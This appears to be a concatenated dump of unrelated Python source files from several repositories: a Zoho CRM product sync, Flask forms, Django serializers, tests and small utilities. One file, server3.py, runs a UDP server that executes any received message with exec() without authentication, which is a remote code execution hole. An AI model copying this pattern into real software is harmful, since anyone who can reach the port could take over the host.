SET id = product_category.id, name = %s
RETURNING id
""", (
# INSERT clause
cat.name, cat.slug, cat.level, cat.description,
cat.lft, cat.rght, cat.tree_id,
cat.background_image, cat.background_image_alt,
cat.description_json, cat.parent_id,
'{}', '{}',
# UPDATE clause
cat.name
))
cat.id = cursor.fetchone()[0]
comment(f'{cat.name}: {cat.id}')
for i, child_cat in enumerate(cat.children):
cat.children[i].parent_id = cat.id
child_cat.parent_id = cat.id
cursor.execute("""
INSERT INTO product_category
(name, slug, level, description, lft, rght, tree_id,
background_image, background_image_alt, description_json, parent_id,
metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (slug) DO UPDATE
SET id = product_category.id, name = %s
RETURNING id
""", (
# INSERT clause
child_cat.name, child_cat.slug, child_cat.level, child_cat.description,
child_cat.lft, child_cat.rght, child_cat.tree_id,
child_cat.background_image, child_cat.background_image_alt,
child_cat.description_json, child_cat.parent_id,
'{}', '{}',
# UPDATE clause
child_cat.name
))
cat.children[i].id = cursor.fetchone()[0]
comment(f' {child_cat.name}: {cat.children[i].id}')
return cat
def handle_product_collection(collections: list = None) -> None:
global cursor
warning('COLLECTIONS')
for c, collection in enumerate(collections):
cursor.execute("""
INSERT INTO product_collection
(name, slug, background_image, seo_description, seo_title,
is_published, description,
publication_date, background_image_alt, description_json,
metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT(slug) DO UPDATE
SET id = product_collection.id, name = %s
RETURNING id
""", (
# INSERT clause
collection.name, collection.slug, '', '', '', 'True', '',
'NOW()', '', '{}', '{}', '{}',
# UPDATE clause
collection.name
))
collections[c].id = cursor.fetchone()[0]
comment(f'{collection.name}: {collection.id}')
return collections
def fix_category_hierarchy():
info('===== FIXING HIERARCHY =====')
global db
"""
Note: this only is going to work for 2-level category hierarchies, as the data
given for the import is set up that way.
:return:
"""
warning("Rebuilding category hierarchy")
# Rebuild the category nested set hierarchy (◔_◔)
cursor = db.cursor(cursor_factory=DictCursor)
fields = ['id', 'name', 'slug', 'lft', 'rght', 'tree_id', 'level', 'parent_id']
cursor.execute("""SELECT * FROM product_category""")
categories = []
for result in cursor.fetchall():
category = Category(result['name'])
for f in fields:
setattr(category, f, result[f])
categories.append(category)
for cat in categories:
if cat.parent_id:
parent = next((p for p in categories if p.id == cat.parent_id), None)
if parent is None:
error(
f'Cannot find parent category for "{cat.name}" (pid {cat.parent_id})')
return False
else:
parent.children.append(cat)
parent_categories = list(filter(lambda c: c.parent_id is None, categories))
tid = 1
for pc in parent_categories:
left = 1
pc.tree_id = tid
pc.lft = left
left += 1
for child in pc.children:
child.lft = left
child.rght = left + 1
child.tree_id = tid
child.level = 1
left += 2
pc.rght = left
tid += 1
# Write to db
for pc in parent_categories:
for c in [pc] + pc.children:
comment(f'Updating hierarchy for {c.name} ({c.id}).')
try:
cursor.execute("""
UPDATE product_category
SET lft = %s, rght = %s, tree_id = %s, level = %s
WHERE id = %s
""", (c.lft, c.rght, c.tree_id, c.level, c.id))
except Exception as e:
error(f'Cannot set hierarchy: "{c.name}" ({c.id}).')
error(e)
return False
return True
def disable_products(products_to_disable=None):
global cursor
if products_to_disable is None:
return True
skus = tuple(str(p['SKU']).strip("'") for p in products_to_disable if p['SKU'])
if len(skus) < 1:
return 0
warning(f'Disabling {len(skus)} Products')
cursor.execute("""
UPDATE product_product p
SET is_published = FALSE
FROM product_productvariant pv
WHERE pv.product_id = p.id AND pv.sku in %s
""", (skus,))
return len(products_to_disable)
def do_import(arguments=None):
info('===== RUNNING IMPORT =====')
global oauth_token
global cursor
environment = 'production'
if '--local' in arguments:
del arguments[0]
environment = 'local'
load_dotenv()
sync_all = False
force_images = False
if '--sync-all' in arguments:
sync_all = True
if '--force-images' in arguments:
force_images = True
db = db_connect(environment)
if not db:
error('Cannot connect to database.')
return False
cursor = db.cursor()
if not get_oauth():
error("Could not retrieve updated access token.")
return False
url = 'https://www.zohoapis.com/crm/v2/Products'
headers = {
'Authorization': f'Zoho-oauthtoken {oauth_token}'
}
# Limit the amount of calls we need to make by only grabbing changes
# within the last 48 hours
# (should also be enough to catch a failed sync or two)
# can override with --sync-all flag
if not sync_all:
last_modified = datetime.now() - timedelta(hours=48)
modified_since = f'{last_modified.strftime("%Y-%m-%d")}T00:00:00+05:00'
headers['If-Modified-Since'] = modified_since
parameters = {
'page': 1,
'per_page': 200,
}
keep_going = True
while keep_going:
info(f'Fetching page {parameters["page"]}')
response = requests.get(url=url, headers=headers, params=parameters)
if response is not None:
data = response.json()
response_info = data['info']
products = list(filter(lambda x: x['Web_Available'] is True, data['data']))
remove_products = list(
filter(lambda x: x['Web_Available'] is False, data['data']))
for product in products:
"""
example `product`:
{
'$approval': {
'approve': False,
'delegate': False,
'reject': False,
'resubmit': False
},
'$approval_state': 'approved',
'$approved': True,
'$currency_symbol': '$',
'$editable': True,
'$in_merge': False,
'$orchestration': False,
'$process_flow': False,
'$review': None,
'$review_process': {
'approve': False,
'reject': False,
'resubmit': False
},
'$state': 'save',
'$taxable': True,
'Attribute_Name_1': 'Style',
'Attribute_Name_2': 'Joint Size',
'Attribute_Name_3': 'Brand',
'Attribute_Name_4': None,
'Attribute_Name_5': None,
'Attribute_Name_6': None,
'Attribute_Value_1': 'Slide',
'Attribute_Value_2': '14mm',
'Attribute_Value_3': 'NA',
'Attribute_Value_4': None,
'Attribute_Value_5': None,
'Attribute_Value_6': None,
'Category': 'Slides',
'Collection': None,
'Cost': 3.5,
'Created_Time': '2021-04-30T13:49:13-04:00',
'Department': 'Smoke Shop',
'Description': None,
'Margin': 76.651,
'Needs_Reviewed': True,
'Owner': {
'email': '<EMAIL>',
'id': '3980137000000211013',
'name': '<NAME>'
},
'Product_Name': 'Got Vape - FGA366 Yellow/Black 14mm Slide | 400000236445',
'Product_Photos': None,
'Record_Image': None,
'SKU': "400000236445'",
'Supplier': 'Got Vape',
'Tag': [],
'Tax': [],
'Taxable': True,
'UPC': None,
'Unit_Price': 14.99,
'Web_Available': True,
'id': '3980137000009112120'
}
"""
handle_raw_product(product, {
'force_images': force_images
})
disable_products(remove_products)
parameters['page'] += 1
keep_going = response_info['more_records']
else:
keep_going = False
return True
def bust_cache():
info('===== CLEARING CACHE =====')
qk = cache.keys("query-*")
cache.delete_many(qk)
return True
if __name__ == '__main__':
result = (do_import(sys.argv[1:]) and
fix_category_hierarchy() and
bust_cache())
message = 'Zoho sync completed successfully.'
has_error = 0
if result:
warning('Done.')
else:
has_error = 1
error("Completed with errors. There is likely output above.")
message = 'Zoho sync had errors.'
# Try sending email
try:
send_email('Zoho Sync Status', message)
except:
error("Could not send email notification.")
# Exit script
sys.exit(has_error)
| 1.984375 | 2 |
dataviva/apps/user/forms.py | joelvisroman/dataviva-site | 126 | 12796766 | <reponame>joelvisroman/dataviva-site
from flask_wtf import Form
from wtforms import TextField, DateField, BooleanField, HiddenField, validators, PasswordField, SelectField
class SignupForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
fullname = TextField('fullname', validators=[validators.Required(),
validators.Length(min=3, max=128,
message='Name field must be between 3 and 128 characters long.')])
password = PasswordField('password', validators=[validators.Required(),
validators.EqualTo('confirm',
message='Passwords must match')])
confirm = PasswordField('confirm', validators=[validators.Required()])
agree_mailer = BooleanField('agree_mailer')
class SigninForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
password = PasswordField('password', validators=[validators.Required()])
class ChangePasswordForm(Form):
current_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
new_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
confirm = PasswordField('confirm', validators=[validators.Required(), validators.EqualTo(
'<PASSWORD>password', message='Passwords must match')])
class LoginForm(Form):
provider = HiddenField('provider', validators=[validators.Required()])
remember_me = BooleanField('remember_me', default=False)
class ForgotPasswordForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
class ProfileForm(Form):
fullname = TextField('fullname', validators=[validators.Required(), validators.Length(min=3, max=128, message='Name field must be between 3 and 128 characters long.')])
email = TextField('email', validators=[validators.Required(), validators.Email()])
birthday = DateField('birthday', validators=[ validators.Required()],format='%d/%m/%Y', description='Date format: day/month/year')
country = TextField('country', validators=[validators.Required(), validators.Length(max=50, message='Country field must be 50 characters long.')])
state_province_region = TextField('state_province_region', validators=[validators.Required(), validators.Length( max=50, message='Format error.')])
city = TextField('city', validators=[validators.Required(), validators.Length(max=50, message='City field must be 50 characters long.')])
profile = SelectField('gender', choices=[('development_agents', 'Development Agents'),('entrepreneurs', 'Entrepreneurs'), ('students', 'Students and Professionals')])
occupation = TextField('occupation', validators=[validators.Required(), validators.Length(max=50, message='Occupation field must be 50 characters long.')])
institution = TextField('institution', validators=[validators.Optional(), validators.Length(max=50, message='Institution field must be 50 characters long.')])
agree_mailer = BooleanField('agree_mailer')
| 2.96875 | 3 |
docker/molecule/tests/test_docker.py | thisisthetechie/raspberry-ansible | 43 | 12796767 | <filename>docker/molecule/tests/test_docker.py
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_is_docker_installed(host):
package_docker = host.package('docker-ce')
assert package_docker.is_installed
def test_run_hello_world_container_successfully(host):
hello_world_ran = host.run("docker run hello-world")
assert 'Hello from Docker!' in hello_world_ran.stdout
| 2.21875 | 2 |
bubble_sorter/__init__.py | joshuabode/bubble-sort-python | 0 | 12796768 | from .bubble_sort import *
| 1.078125 | 1 |
redditpoller/migrations/0014_auto_20170304_1513.py | ericleepa/watcherforreddit | 8 | 12796769 | <filename>redditpoller/migrations/0014_auto_20170304_1513.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-04 20:13
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('redditpoller', '0013_watchedsubreddit_watchedsubredditthreads'),
]
operations = [
migrations.RenameField(
model_name='watchedsubredditthreads',
old_name='parent_subreddt',
new_name='parent_subreddit',
),
]
| 1.585938 | 2 |
common_holdings.py | Anindya-Das02/Portfolio-Common-Holdings | 0 | 12796770 | <reponame>Anindya-Das02/Portfolio-Common-Holdings
from loggers import COMPARE_FUNDS_DIR_PATH, finish, prgm_end, linespace
import os
os.chdir(COMPARE_FUNDS_DIR_PATH)
amcs = [f for f in os.listdir('.') if os.path.isfile(f)]
if len(amcs) == 0:
print("No AMCs file found for comparision.. please add files in 'Compare Funds' folder to compare!")
exit(0)
print(f"Comparing following {len(amcs)} funds:")
for fund_name in amcs:
print(f" - {fund_name}")
linespace()
holdings = []
for amc in amcs:
with open(amc,'r') as f:
holdings.append(set(f.readlines()))
common_companies = set.intersection(*holdings)
print(f"No of common companies: {len(common_companies)}")
counter = 1
for i in common_companies:
print(f"[{counter}]. {i}")
counter += 1
finish()
prgm_end()
| 2.671875 | 3 |
dj_vercereg/vercereg/serializers.py | davidath/dj-vercereg | 0 | 12796771 | # Copyright 2014 The University of Edinburgh
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# from models import WorkspaceItem
from models import Workspace
from models import PESig
from models import FunctionSig
from models import LiteralSig
from models import PEImplementation
from models import FnImplementation
from models import RegistryUserGroup
from models import Connection
from models import FunctionParameter
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from rest_framework import serializers
from vercereg.utils import get_base_rest_uri
##############################################################################
class UserSerializer(serializers.HyperlinkedModelSerializer):
def get_reg_groups(self, obj):
toret = []
request = self.context.get('request')
for v in obj.groups.values():
group_id = v['id']
g = Group.objects.get(id=group_id)
try:
rug_instance = RegistryUserGroup.objects.get(group=g)
rug = (get_base_rest_uri(request) + 'registryusergroups/' +
str(rug_instance.id) + '/')
toret.append(rug)
except RegistryUserGroup.DoesNotExist:
pass
return toret
groups = serializers.SerializerMethodField('get_reg_groups')
def restore_object(self, attrs, instance=None):
user = super(UserSerializer, self).restore_object(attrs, instance)
user.set_password(attrs['password'])
return user
class Meta:
model = User
fields = (
'url',
'username',
'email',
'first_name',
'last_name',
'password',
'groups',
'ownsgroups')
write_only_fields = ('password',)
read_only_fields = ('ownsgroups',)
# class UserUpdateSerializer(serializers.HyperlinkedModelSerializer):
# groups = serializers.SerializerMethodField('get_reg_groups')
#
# def get_reg_groups(self, obj):
# toret = []
# request = self.context.get('request')
# for v in obj.groups.values():
# group_id = v['id']
# g = Group.objects.get(id=group_id)
# try:
# rug_instance = RegistryUserGroup.objects.get(group=g)
# rug = get_base_rest_uri(request) + 'registryusergroups/' +
# str(rug_instance.id) + '/'
# toret.append(rug)
# except RegistryUserGroup.DoesNotExist:
# pass
# return toret
#
# def restore_object(self, attrs, instance=None):
# user = super(UserUpdateSerializer, self).restore_object(attrs, instance)
# user.set_password(attrs['password'])
# return user
#
# class Meta:
# model = User
# fields = ('username', 'email', 'first_name', 'last_name', 'password',
# 'groups', 'ownsgroups',)
# write_only_fields = ('password',)
# read_only_fields = ('username',)
##############################################################################
class RegistryUserGroupSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
# FIXME: The following is excluded as it break django rest for some reason.
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', 'owner', )
class RegistryUserGroupPutSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
# ownerusername = serializers.CharField(source='get_owner_username',
# read_only=True)
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', )
##############################################################################
# class AdminRegistryUserGroupSerializer
# (serializers.HyperlinkedModelSerializer):
# group_name = serializers.CharField(source='get_group_name')#,
# read_only=True)
# owner_username = serializers.CharField(source='get_owner_username',
# read_only=True)
#
# class Meta:
# model = RegistryUserGroup
# fields = ('url', 'group_name', 'owner_username',
# 'group', 'owner', 'description')
# read_only_fields = ('group', )
##############################################################################
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ('name',)
##############################################################################
class PEImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PEImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class FnImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FnImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class WorkspaceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Workspace
depth = 0
fields = ('id', 'url', 'name', 'owner', 'description',
'clone_of', 'creation_date')
read_only_fields = ('owner', 'creation_date',)
##############################################################################
class WorkspaceDeepSerializer(serializers.HyperlinkedModelSerializer):
pes = serializers.CharField(source='get_pesigs')
functions = serializers.CharField(source='get_fnsigs')
literals = serializers.CharField(source='get_literalsigs')
peimplementations = serializers.CharField(source='get_peimplementations')
fnimplementations = serializers.CharField(source='get_fnimplementations')
class Meta:
model = Workspace
# TODO (nice-to-have) revisit the depth issue, user serialization is
# not good enough - disabled for now.
depth = 0
read_only_fields = ('owner', 'creation_date')
def transform_pes(self, obj, value):
request = self.context.get('request')
pes = obj.pesig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'pes/' +
str(p.id), pes)
def transform_functions(self, obj, value):
request = self.context.get('request')
fns = obj.functionsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'functions/' +
str(p.id), fns)
def transform_literals(self, obj, value):
request = self.context.get('request')
lits = obj.literalsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'literals/' +
str(p.id), lits)
def transform_peimplementations(self, obj, value):
request = self.context.get('request')
peimpls = obj.peimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'peimpls/' +
str(p.id), peimpls)
def transform_fnimplementations(self, obj, value):
request = self.context.get('request')
fnimpls = obj.fnimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'fnimpls/' +
str(p.id), fnimpls)
##############################################################################
class PESigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PESig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'connections',
'creation_date',
'peimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class ConnectionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Connection
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
class FunctionParameterSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FunctionParameter
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
##############################################################################
class FunctionSigSerializer(serializers.HyperlinkedModelSerializer):
# implementations = serializers.WritableField
# (source='fnimplementation_set', required=False)
class Meta:
model = FunctionSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'creation_date',
'return_type',
'parameters',
'fnimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class LiteralSigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = LiteralSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'value',
'description',
'creation_date',
'clone_of')
read_only_fields = ('user', 'creation_date', )
| 1.765625 | 2 |
2018/aoc/d7/test.py | lukaselmer/adventofcode | 1 | 12796772 | <gh_stars>1-10
import unittest
from unittest.mock import mock_open, patch
from aoc.d7.main import step_order, time_required
DATA = "Step C must be finished before step A can begin.\nStep C must be finished before step F can begin.\nStep A must be finished before step B can begin.\nStep A must be finished before step D can begin.\nStep B must be finished before step E can begin.\nStep D must be finished before step E can begin.\nStep F must be finished before step E can begin.\n"
class TestCase(unittest.TestCase):
def test_step_order(self):
with patch("builtins.open", mock_open(read_data=DATA)):
self.assertEqual("CABDFE", step_order())
def test_time_required(self):
with patch("builtins.open", mock_open(read_data=DATA)):
self.assertEqual(15, time_required(0, 2))
if __name__ == "__main__":
unittest.main()
| 2.875 | 3 |
secure_data_store/__init__.py | HumanBrainProject/secure-data-store | 1 | 12796773 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""Top-level package for Secure Data Store."""
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
| 1.085938 | 1 |
server/server3.py | lthurlow/scaling-computing-machine | 0 | 12796774 | import pdb # for debuggin
import sys
import time
import pprint
import fcntl # for get_ip_address
import struct # for get_ip_address
import threading # for threading UDPServer
import socket # for UDPServer
#sys.path.append("./third_party/libs/") # for scapy
#import StringIO # for dummy_exec
#import logging # for logging, scapy modify logging level
#logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
#from scapy.all import *
import anhost # linux networking files
def set_env():
return
def dummy_exec(code):
# create file-like string to capture output
codeOut = StringIO.StringIO()
codeErr = StringIO.StringIO()
# capture output and errors
sys.stdout = codeOut
sys.stderr = codeErr
try:
exec(code)
except:
sys.stdout = "error"
sys.stderr = "error"
# restore stdout and stderr
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
#For now throw away the errors
return str(codeOut.getvalue())
def handle_pkt(eth):
eth_src = ':'.join(hex(x) for x in map(ord, eth.src))
eth_dst = ':'.join(hex(x) for x in map(ord, eth.dst))
if eth.type != dpkt.ethernet.ETH_TYPE_IP:
#print "Ethernet pkt"
return
ip = eth.data
if ip.p == dpkt.ip.IP_PROTO_UDP:
ip_src = '.'.join(str(x) for x in map(ord, ip.src))
ip_dst = '.'.join(str(x) for x in map(ord, ip.dst))
udp = ip.data
udp_src = udp.sport
udp_dst = udp.dport
udp_data = dummy_exec(str(udp.data))
print(ip_src, ip_dst)
send(IP(dst=ip_dst,src=ip_src)/UDP(sport=udp_src,dport=udp_dst)/udp_data,\
iface="eth1", verbose=True)
else:
return
print(anhost.get_int_ip())
HOST, PORT = str(anhost.get_int_ip()), 50000
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((HOST,PORT))
while True:
msg, addr = sock.recvfrom(1024)
print("msg:", msg)
server_thread = threading.Thread(target=dummy_exec,args=(msg,))
server_thread.start()
print(server_thread.join())
| 2 | 2 |
core/mail.py | jasonvriends/lifetracker-backend | 0 | 12796775 | <reponame>jasonvriends/lifetracker-backend
import os
from fastapi import BackgroundTasks
from fastapi_mail import ConnectionConfig, FastMail, MessageSchema
from core.settings import settings
from schemas.auth import EmailSchema
conf = ConnectionConfig(
MAIL_USERNAME=settings.MAIL_USERNAME,
MAIL_PASSWORD=settings.MAIL_PASSWORD,
MAIL_FROM=settings.MAIL_FROM,
MAIL_PORT=settings.MAIL_PORT,
MAIL_SERVER=settings.MAIL_SERVER,
MAIL_FROM_NAME=settings.PROJECT_TITLE,
TEMPLATE_FOLDER=f"{os.path.dirname(os.path.dirname(os.path.realpath(__file__)))}/templates/email",
MAIL_TLS=True,
MAIL_SSL=False,
USE_CREDENTIALS=True
)
def send_mail(background_tasks: BackgroundTasks, subject: str, emails: EmailSchema, template_name: str):
message = MessageSchema(
subject=subject,
recipients=emails.emails,
template_body=emails.body,
subtype='html',
)
fm = FastMail(conf)
background_tasks.add_task(fm.send_message, message,
template_name=template_name)
| 1.898438 | 2 |
stack/valid_parenthesis.py | javyxu/algorithms-python | 8 | 12796776 | """
Given a string containing just the characters
'(', ')', '{', '}', '[' and ']',
determine if the input string is valid.
The brackets must close in the correct order,
"()" and "()[]{}" are all valid but "(]" and "([)]" are not.
"""
def is_valid(s:"str")->"bool":
stack = []
dic = { ")":"(",
"}":"{",
"]":"["}
for char in s:
if char in dic.values():
stack.append(char)
elif char in dic.keys():
if stack == []:
return False
s = stack.pop()
if dic[char] != s:
return False
return stack == []
if __name__ == "__main__":
paren = "[]"
print(paren, is_valid(paren))
paren = "[]()[]"
print(paren, is_valid(paren))
paren = "[[[]]"
print(paren, is_valid(paren))
paren = "{([])}"
print(paren, is_valid(paren))
paren = "(}"
print(paren, is_valid(paren))
| 4.0625 | 4 |
decloud/acquisitions/sensing_layout.py | CNES/decloud | 8 | 12796777 | # -*- coding: utf-8 -*-
"""
Copyright (c) 2020-2022 INRAE
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
"""Classes for acquisition layouts"""
from dataclasses import dataclass
# --------------------------------------------- Acquisition classes ----------------------------------------------------
@dataclass
class GenericAcquisition:
""" Sentinel Acquisition """
timestamp: int
@dataclass
class S1Acquisition:
""" Sentinel-1 Acquisition """
ascending: bool = False
@dataclass
class S2Acquisition:
""" Sentinel-2 Acquisition """
min_cloud_percent: 'typing.Any'
max_cloud_percent: float
# ------------------------------------------- Acquisition layout class -------------------------------------------------
class AcquisitionsLayout(dict):
"""
Class storing the acquisition layout
"""
SENSOR_S1_KEY = "S1"
SENSOR_S2_KEY = "S2"
MAX_S1S2_TIMESTAMP_DELTA_KEY = "MAX_S1S2_TIMESTAMP_DELTA_KEY"
TIMESTAMP_BEGIN_KEY = "TIMESTAMP_BEGIN_KEY"
TIMESTAMP_END_KEY = "TIMESTAMP_END_KEY"
OPTIONS = {}
def new_acquisition(self, name, s1_acquisition=None, s2_acquisition=None, max_s1s2_gap_hours=None,
timeframe_origin=False, timeframe_start_hours=0, timeframe_end_hours=0):
"""
Add a new acquisition in the layout.
Parameters:
name: acquisition name (e.g. "Img_t-1")
s1_acquisition: a S1Acquisition instance or None
s2_acquisition: a S2Acquisition instance or None
max_s1s2_gap_hours: if both s1_acquisition and s2_acquisition are not None, this must be provided (maximum
number of hours between the s1_acquisition date and the s2_acquisition date)
timeframe_origin: True or False. If True, the acquisition will be considered as the temporal origin for the
other acquisitions. Meaning that the timeframe_start_hours and timeframe_end_hours or the other
acquisitions will be relative to the date of the s2_acquisition created with timeframe_origin=True. Only
one acquisition can be set as origin.
timeframe_start_hours, timeframe_end_hours: range of the timeframe. Relative to the acquisition which is the
reference (i.e. the only acquisition that has timeframe_origin=True)
"""
# Add a new key in the dict
assert name not in self
self[name] = dict()
if s1_acquisition is not None:
assert isinstance(s1_acquisition, S1Acquisition)
self[name][self.SENSOR_S1_KEY] = s1_acquisition
if s2_acquisition is not None:
assert isinstance(s2_acquisition, S2Acquisition)
self[name][self.SENSOR_S2_KEY] = s2_acquisition
# At least s1_acquisition or s2_acquisition must be different than None
assert s1_acquisition is not None or s2_acquisition is not None
# If both s1_acquisition and s2_acquisition are different than None, we must have the max_s1s2_gap_hours
# its default value is None
self[name][self.MAX_S1S2_TIMESTAMP_DELTA_KEY] = None
if s1_acquisition is not None and s2_acquisition is not None:
assert max_s1s2_gap_hours is not None
assert max_s1s2_gap_hours > 0
self[name][self.MAX_S1S2_TIMESTAMP_DELTA_KEY] = max_s1s2_gap_hours * 3600
# No need to set a [start, end] range if the acquisition is set as the reference (it will be the origin)
if timeframe_origin is True:
# Can be only one acquisition set as reference
for acquisition_name in self:
if acquisition_name != name:
assert not self.is_ref(acquisition_name)
assert timeframe_start_hours == 0
assert timeframe_end_hours == 0
self[name][self.TIMESTAMP_BEGIN_KEY] = min(timeframe_start_hours, timeframe_end_hours) * 3600
self[name][self.TIMESTAMP_END_KEY] = max(timeframe_start_hours, timeframe_end_hours) * 3600
def options(self, options):
self.OPTIONS = options
def is_siblings(self, acq_list, acq_name):
"""
Return True if the two acquisitions is set as sibling.
"""
if "siblings" in self.OPTIONS.keys():
for sibling in self.OPTIONS["siblings"]:
for acq in acq_list:
if acq in sibling and acq_name in sibling:
return True
return False
def is_ref(self, name):
"""
Return True if the acquisition is set as the temporal origin.
"""
return self[name][self.TIMESTAMP_BEGIN_KEY] == 0 and self[name][self.TIMESTAMP_END_KEY] == 0
def get_ref_name(self):
"""
Return the acquisition name which is the temporal origin.
"""
for acquisition_name in self:
if self.is_ref(acquisition_name):
return acquisition_name
raise Exception("No temporal origin found! You must set one reference using "
"new_acquisition(..., timeframe_origin=True, ...)")
def get_timestamp_range(self, name):
"""
Return the timestamp range (timestamp_begin, timestamp_end)
"""
return self[name][self.TIMESTAMP_BEGIN_KEY], self[name][self.TIMESTAMP_END_KEY]
def get_s1s2_max_timestamp_delta(self, name):
"""
Return the get_s1s2_max_timestamp_delta of the specified acquisition.
None can be returned (if only a single s1_acquisition or a single s2_acquisition)
"""
return self[name][self.MAX_S1S2_TIMESTAMP_DELTA_KEY]
def _get_sx_acquisition(self, name, sensor_key):
if sensor_key not in self[name]:
return None
return self[name][sensor_key]
def has_s1_acquisition(self, name):
"""
Return True if the acquisition has a S1Acquisition
"""
return self.SENSOR_S1_KEY in self[name]
def has_s2_acquisition(self, name):
"""
Return True if the acquisition has a S2Acquisition
"""
return self.SENSOR_S2_KEY in self[name]
def get_s1_acquisition(self, name):
"""
Return the s1_acquisition of the specified acquisition
name: acquisition name
"""
return self._get_sx_acquisition(name=name, sensor_key=self.SENSOR_S1_KEY)
def get_s2_acquisition(self, name):
"""
Return the s2_acquisition of the specified acquisition
name: acquisition name
"""
return self._get_sx_acquisition(name=name, sensor_key=self.SENSOR_S2_KEY)
def summarize(self):
"""
This function summarizes the acquisition layout, displaying a nice table
Example:
Cresson et al. layout:
| t-1 | t | t+1
----------------+----------------+----------------+----------------
S1 | / | +/-24h | /
----------------+----------------+----------------+----------------
S2 | [-360h, -120h] | [0h, 0h] | [120h, 360h]
| 0-0% cld. | 0-0% cld. | 0-0% cld.
"""
max_head_len = max([len(key) for key in self] + [16])
def _cell(msg):
return msg.center(max_head_len, " ")
def _round_hours(n_seconds):
return "{}h".format(int(n_seconds / 3600))
def _summarize_timerange(n_seconds_1, n_seconds_2):
ts_min = min(n_seconds_1, n_seconds_2)
ts_max = max(n_seconds_1, n_seconds_2)
return "[{}, {}]".format(_round_hours(ts_min), _round_hours(ts_max))
def _cell_s1(key):
content = "/"
if self.has_s1_acquisition(key):
delta = self.get_s1s2_max_timestamp_delta(key)
content = "+/-{}".format(_round_hours(delta))
return _cell(content)
def _cell_s2(key):
content = "/"
if self.has_s2_acquisition(key):
ts_begin, ts_end = self.get_timestamp_range(key)
content = _summarize_timerange(ts_begin, ts_end)
return _cell(content)
def _cell_s2b(key):
content = "/"
if self.has_s2_acquisition(key):
s2_acquisition = self.get_s2_acquisition(key)
content = "{}-{}% cld.".format(s2_acquisition.min_cloud_percent, s2_acquisition.max_cloud_percent)
return _cell(content)
keys = self.keys()
headers = [_cell("")] + [_cell(key) for key in keys]
